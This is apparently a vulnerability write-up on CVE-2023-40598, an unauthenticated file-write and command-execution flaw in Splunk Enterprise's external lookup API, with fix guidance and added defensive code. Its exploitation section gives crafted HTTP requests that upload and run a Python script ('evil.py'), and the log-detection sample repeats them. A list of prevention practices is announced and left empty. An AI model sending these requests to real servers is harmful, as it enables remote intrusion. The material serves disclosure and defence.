This is an overview of the CVE-2023-40598 vulnerability, which affects Splunk Enterprise versions below 8.2.12, 9.0.6, and 9.1.1. We will explain the nature of the vulnerability, how it can be exploited, and how it can be fixed. We will also provide code examples, links to web pages with valuable information, and tips on how to prevent similar vulnerabilities in the future.
CVE-2023-40598 is a vulnerability that allows an unauthenticated, remote attacker to upload arbitrary files to a Splunk Enterprise system and execute commands on the underlying operating system. This vulnerability is due to a lack of authentication in a specific API and improper validation of user-supplied data.
Splunk Enterprise is a software platform that collects, analyzes, and visualizes data from various sources. Splunk Enterprise provides a web-based management interface that allows users to configure and manage the system, as well as access various features and applications. One of these features is the external lookup, which allows users to enrich data with information from external sources, such as databases, scripts, or web services.
The external lookup feature uses a legacy internal function called `lookup_external.py`, which is located in the `$SPLUNK_HOME/bin` directory. This function is responsible for invoking external commands or scripts and passing data to them via standard input and output. However, this function does not require any authentication or authorization. It does not check the validity or integrity of the data it receives. Therefore, an attacker can craft a malicious request that calls this function and passes arbitrary data to it, such as a file name and content. The function will then write the data to the specified file name in the `$SPLUNK_HOME/bin` directory, without any verification or sanitization.
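The paragraph above describes a handler that accepts a caller-supplied file name and content without authentication and writes them straight into `$SPLUNK_HOME/bin`. The following is an added example, not Splunk's code, of the checks a hardened handler of that shape would enforce instead: it requires an authenticated principal, lets a request select only a pre-registered script by bare file name, passes the request body to the script's standard input rather than writing it to disk, and verifies that the resolved path still lies inside the lookup directory. `REGISTERED_LOOKUPS`, the function names and the `/tmp/constructed_lookups` path are all constructed for the example.

```python
# Added example, not Splunk's code: the checks a hardened "external lookup"
# handler would enforce. The write-up describes a handler that writes
# caller-supplied content to a caller-supplied file name under
# $SPLUNK_HOME/bin with no authentication and no validation; this version
# requires a principal, only selects among pre-registered scripts, never
# writes the request body to disk, and proves the resolved path stays
# inside the lookup directory. Names and the allowlist are constructed.
import re
from pathlib import Path
from typing import Optional

# Scripts registered by an administrator ahead of time (constructed set).
# A request may pick one of these; it can never introduce a new name.
REGISTERED_LOOKUPS = frozenset({"geo_lookup.py", "dns_lookup.py"})

# A bare file name only: no separators, no "..", no NUL, no spaces.
_NAME_RE = re.compile(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+")


class LookupRejected(ValueError):
    """Raised when a lookup request fails a check."""


def validate_lookup_name(name: str) -> str:
    """Accept `name` only if it is a bare file name on the registered list."""
    if not _NAME_RE.fullmatch(name):
        raise LookupRejected(f"malformed lookup name: {name!r}")
    if name not in REGISTERED_LOOKUPS:
        raise LookupRejected(f"lookup not registered: {name!r}")
    return name


def resolve_lookup_path(lookup_dir: Path, name: str) -> Path:
    """Resolve the script path and require it to lie inside `lookup_dir`."""
    base = lookup_dir.resolve()
    target = (base / validate_lookup_name(name)).resolve()
    # Defence in depth: a symlink planted under lookup_dir could still point
    # elsewhere, so check the resolved location, not just the name.
    if target.parent != base:
        raise LookupRejected(f"path escapes lookup directory: {target}")
    return target


def plan_lookup_invocation(lookup_dir: Path, principal: Optional[str],
                           name: str, data: str) -> dict:
    """Describe what the handler would run; the request body goes to the
    script's stdin and is never written to a file."""
    if not principal:
        raise LookupRejected("authentication required")
    script = resolve_lookup_path(lookup_dir, name)
    return {
        "principal": principal,
        "script": str(script),
        "stdin_bytes": len(data.encode("utf-8")),
    }


if __name__ == "__main__":
    d = Path("/tmp/constructed_lookups")  # constructed path for the demo
    print(plan_lookup_invocation(d, "alice", "geo_lookup.py", "8.8.8.8\n"))
    for bad in ("evil.py", "../evil.py", "geo_lookup.py/../evil.py"):
        try:
            plan_lookup_invocation(d, "alice", bad, "")
        except LookupRejected as e:
            print("rejected:", e)
```

The name check and the resolved-path check are deliberately separate: the regex stops traversal strings before they reach the filesystem, and the `resolve()` comparison catches anything the name check cannot see, such as a symlink already sitting in the directory.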
A successful exploit of this vulnerability could allow the attacker to store malicious files on the system, execute arbitrary commands on the operating system and elevate privileges to root. This could compromise the confidentiality, integrity, and availability of the system and the data it processes.
An attacker would need to send a specially crafted HTTP request to the Splunk Enterprise web interface, targeting the external lookup API. The request would have the following format:

```http
POST /en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
Content-Length: <length>

lookup_external.py&lookup=<file_name>&data=<file_content>
```
The `lookup_external.py` parameter specifies the internal function to call, the `lookup` parameter specifies the file name to write to, and the `data` parameter specifies the file content to write. The file name and content can be any arbitrary values. The file name should also have a valid extension, such as `.py`, `.sh`, or `.exe`, depending on the type of file and the operating system. The file content should be a valid script or executable that can run on the target system and perform the desired actions, such as creating a reverse shell, downloading additional malware, or deleting files.
For example, the following request would upload a Python script named `evil.py` to the `$SPLUNK_HOME/bin` directory, which would execute the command `whoami` and write the output to a file named `output.txt` in the same directory:

```http
POST /en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external HTTP/1.1
Host: 192.168.1.100:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 113

lookup_external.py&lookup=evil.py&data=import+os%0Aos.system%28%27whoami+%3E+output.txt%27%29
```
The attacker could then execute the uploaded script by accessing it via the web interface:
<http://192.168.1.100:8000/en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external?lookup=evil.py>
The attacker could then check the result of the script execution by reading the `output.txt` file:

<http://192.168.1.100:8000/en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external?lookup=output.txt>

The output would show the user name of the process that executed the script, which would be `root` by default.
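The request sequence above (a POST to the external lookup endpoint followed by GETs that name the uploaded script and its output file) leaves a recognisable trace in web access logs. The following is an added example, not Splunk's code and not Splunk's own log format, of detection logic run over constructed access-log lines in a generic combined-log style: it flags any POST to the endpoint, and any GET whose `lookup` value is not on a registered list. `REGISTERED_LOOKUPS`, the log lines and the hosts in them are all constructed for the example.

```python
# Added example, not Splunk's code or log format: detection logic run over
# constructed web-access log lines in a generic combined-log style. It
# flags requests to the external-lookup endpoint named in the write-up
# that either POST to it (an upload attempt) or ask for a `lookup` value
# that is not on the registered list (e.g. a just-uploaded script or its
# output file). The registered set and all log lines are constructed.
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

ENDPOINT_SUFFIX = "/splunkd/__raw/servicesNS/nobody/search/lookup/external"
REGISTERED_LOOKUPS = frozenset({"geo_lookup.csv", "dns_lookup.py"})

# Generic access-log shape: src ident user [ts] "METHOD target HTTP/x" status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample lines (hosts are documentation/private ranges).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2023:10:01:02 +0000] "GET /en-US/app/search/search HTTP/1.1" 200
203.0.113.9 - - [05/Sep/2023:10:02:15 +0000] "POST /en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external HTTP/1.1" 200
203.0.113.9 - - [05/Sep/2023:10:02:16 +0000] "GET /en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external?lookup=evil.py HTTP/1.1" 200
203.0.113.9 - - [05/Sep/2023:10:02:20 +0000] "GET /en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external?lookup=output.txt HTTP/1.1" 200
10.0.0.7 - - [05/Sep/2023:10:03:00 +0000] "GET /en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external?lookup=geo_lookup.csv HTTP/1.1" 200
this line is deliberately unparseable
"""


def parse_line(line: str) -> Optional[dict]:
    """Return the request fields of one log line, or None if it doesn't match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(rec: dict) -> Optional[str]:
    """Return a reason string if the request looks like endpoint abuse."""
    parts = urlsplit(rec["target"])
    if not parts.path.endswith(ENDPOINT_SUFFIX):
        return None
    if rec["method"] == "POST":
        return "POST to external lookup endpoint (possible file write)"
    for name in parse_qs(parts.query).get("lookup", []):
        if name not in REGISTERED_LOOKUPS:
            return f"unregistered lookup requested: {name}"
    return None


def scan(log_text: str) -> list:
    """Run classify() over every parseable line; skip lines that don't parse."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reason = classify(rec)
        if reason:
            findings.append({"src": rec["src"], "ts": rec["ts"],
                             "method": rec["method"], "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['method']}: {f['reason']}")
```

On the sample log this yields three findings, all from the same source address: the POST, the request for `evil.py`, and the request for `output.txt`; the registered `geo_lookup.csv` request is left alone. Correlating the three by source and time window is what turns individual hits into an incident.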
To fix this vulnerability, Splunk has released software updates that address the issue. The affected Splunk Enterprise versions are below 8.2.12, 9.0.6, and 9.1.1. The fixed Splunk Enterprise versions are 8.2.12, 9.0.6, and 9.1.1 or later. Users are advised to upgrade to the latest version as soon as possible.
The software updates can be installed by following the instructions in the Splunk documentation: How to upgrade Splunk Enterprise
Alternatively, users can apply a workaround and disable the external lookup feature by deleting or renaming the `lookup_external.py` file in the `$SPLUNK_HOME/bin` directory. However, this may affect the functionality of some Splunk applications that rely on external lookups.
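Before choosing between the upgrade and the workaround, an administrator needs to know whether a given instance is in the affected range at all. The following is an added example, not Splunk's code, that takes a Splunk Enterprise version string and decides whether it is below the fixed version for its release line (8.2.12, 9.0.6 or 9.1.1, as stated above). The fixed versions come from this page; treating release lines older than 8.2 as affected and lines newer than 9.1 as fixed is the example's own assumption, and the function names are constructed.

```python
# Added example, not Splunk's code: decide whether a Splunk Enterprise
# version string falls in the ranges the write-up lists as affected
# (below 8.2.12, 9.0.6 and 9.1.1). The fixed versions come from the
# page; treating release lines older than 8.2 as affected and lines
# newer than 9.1 as fixed is this example's own assumption.
import re
from typing import Tuple

# Fixed version per release line, as stated on the page.
FIXED_BY_BRANCH = {
    (8, 2): (8, 2, 12),
    (9, 0): (9, 0, 6),
    (9, 1): (9, 1, 1),
}

_VERSION_RE = re.compile(r"\s*v?(\d+(?:\.\d+)*)")


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '9.0.5', 'v9.0.5.1' or '9.0.5 (build abc)' into a tuple of ints."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def is_affected(text: str) -> bool:
    """True if the version is below the fix for its release line."""
    v = parse_version(text)
    branch = v[:2]
    if branch in FIXED_BY_BRANCH:
        # Tuple comparison handles 4-part builds: (9,0,6,1) is not < (9,0,6).
        return v < FIXED_BY_BRANCH[branch]
    # Assumption: lines older than 8.2 never received a fix; lines newer
    # than 9.1 were released after it.
    return branch < (8, 2)


if __name__ == "__main__":
    samples = ("8.2.11", "8.2.12", "9.0.5 (build 1234)", "9.0.6",
               "9.1.0", "9.1.1", "9.2.0")
    for sample in samples:
        print(f"{sample:>20}: {'AFFECTED' if is_affected(sample) else 'fixed'}")
```

The per-branch comparison matters: a plain numeric comparison against the highest fixed version (9.1.1) would wrongly report 9.0.6, which is fixed on its own line, as affected.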
To prevent similar vulnerabilities in the future, Splunk developers and administrators should follow the best practices for secure coding and configuration, such as:
CVE-2023-40598 is a critical vulnerability that affects Splunk Enterprise versions below 8.2.12, 9.0.6, and 9.1.1. It allows an unauthenticated, remote attacker to upload arbitrary files to a Splunk Enterprise system and execute commands on the underlying operating system. This vulnerability is due to a lack of authentication in a specific API and improper validation of user-supplied data. The vulnerability can be exploited by sending a specially crafted HTTP request to the Splunk Enterprise web interface, targeting the external lookup API. The vulnerability can be fixed by upgrading to the latest Splunk Enterprise version or by disabling the external lookup feature. The vulnerability can be prevented by following the best practices for secure coding and configuration. Users are advised to take immediate action to protect their Splunk Enterprise systems from this vulnerability.